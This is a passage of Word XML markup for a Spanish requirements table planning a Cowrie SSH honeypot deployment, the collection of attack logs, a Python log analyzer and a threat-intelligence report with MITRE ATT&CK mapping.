          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R02F01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Instalar y configurar Cowrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FUNC</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R02F01T01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Instalar Cowrie en virtualenv con dependencias</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R02F01T01P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cowrie arranca sin errores y escucha en :2222</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R02F01T02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Configurar cowrie.cfg (hostname, filesystem, credenciales)</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R02F01T02P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Conexión SSH al honeypot muestra prompt falso</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R02F01T03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Configurar iptables para redirigir :22 → :2222</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R02F01T03P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Conexión a puerto 22 aterriza en Cowrie</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R02F01T04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Configurar output en formato JSON</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R02F01T04P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.json se genera con eventos estructurados</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shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Captura de datos de ataques reales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">REQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R03F01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Recopilar ataques durante período de exposición</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FUNC</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R03F01T01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Mantener Cowrie expuesto a Internet durante ≥3 semanas</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R03F01T01P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.json contiene ≥1000 eventos de distintas IPs</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R03F01T02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Monitorizar servicio periódicamente y reiniciar si cae</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R03F01T02P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Logs continuos sin gaps mayores a 24h</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R03F01T03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Descargar los logs al laboratorio local por SSH (puerto 2022)</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R03F01T03P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fichero cowrie.json íntegro en máquina local</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shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Análisis automatizado con Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">REQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R04F01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Desarrollar script de análisis (cowrie_analyzer.py)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FUNC</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R04F01T01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Parsear logs JSON y extraer métricas clave</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R04F01T01P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Script procesa sample_cowrie.json sin errores</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R04F01T02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ranking de IPs atacantes con geolocalización</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R04F01T02P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Top 10 IPs mostradas con país y ciudad</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R04F01T03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ranking de credenciales (usuario/contraseña)</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R04F01T03P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Gráfica top_passwords.png generada correctamente</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R04F01T04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Análisis de comandos ejecutados tras acceso</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R04F01T04P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Lista de comandos con frecuencias</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R04F01T05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Detección de descargas de malware</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R04F01T05P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">URLs y hashes SHA de ficheros descargados listados</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R04F01T06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Generar gráficas con matplotlib</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R04F01T06P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Gráficas PNG en directorio de salida</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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R04F02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Generar datos de prueba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FUNC</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R04F02T01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Script generate_sample_logs.py con 500 sesiones simuladas</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R04F02T01P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">sample_cowrie.json generado con distribución realista</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shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Informe de inteligencia de amenazas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">REQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R05F01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Elaborar informe CTI con mapeo MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FUNC</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R05F01T01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
